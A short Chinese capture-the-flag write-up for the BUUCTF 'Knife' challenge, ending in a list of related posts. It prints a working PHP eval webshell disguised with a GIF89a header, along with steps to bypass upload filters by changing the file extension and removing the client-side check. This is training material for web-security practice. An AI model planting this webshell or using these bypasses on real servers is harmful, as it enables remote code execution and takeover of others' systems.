[极客大挑战 2019]Knife——3.20BUUCTF练习day4(2)

极客大挑战 2019Knife------3.20BUUCTF练习day4(2)

解题内容

在一个文件中输入以下内容,该文件是phtml文件(HTML嵌套PHP代码,可以绕过很多限制)但在本题中要先改文件名为2.gif然后抓包修改后缀名为phtml,因为只可以上传gif和jpg等

php 复制代码
GIF89a
<script language='php'>@eval($_POST[shell]);</script>



蚁剑连接

看了别人的wp,发现还可以删除前端校验函数,直接传phtml文件也可以


拓展

在上传的文件代码中含有GIF89a,这个是在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验

PHP getimagesize(服务器端验证)

读取文件头信息,不是解析整个图片,所以效率较高

相关推荐
周小码16 小时前
10分钟搭建管理后台:laravel-admin实战入门
php·laravel
dog25016 小时前
从重尾到截断流量模型的演进
开发语言·php
菩提小狗18 小时前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
Johnstons19 小时前
游戏网络测试怎么做?从延迟到丢包,一套完整的游戏弱网测试方案
网络·游戏·php
Rocket-Luo19 小时前
谈谈企业中的网络安全
网络·安全·web安全
中云DDoS CC防护蔡蔡20 小时前
短信验证码被攻击怎么办
运维·经验分享·http·网络安全·微信
技术不好的崎鸣同学20 小时前
[BJDCTF2020]The mystery of ip 思路及解法
网络·安全·web安全
Bruce_Liuxiaowei1 天前
2026年7月第1周网络安全形势周报
人工智能·安全·web安全·ai·智能体
楷哥爱开发1 天前
降低网络爬虫成本:基础设施优化指南
服务器·开发语言·php
菩提小狗1 天前
每日安全情报报告 · 2026-07-01
网络安全·漏洞·cve·安全情报·每日安全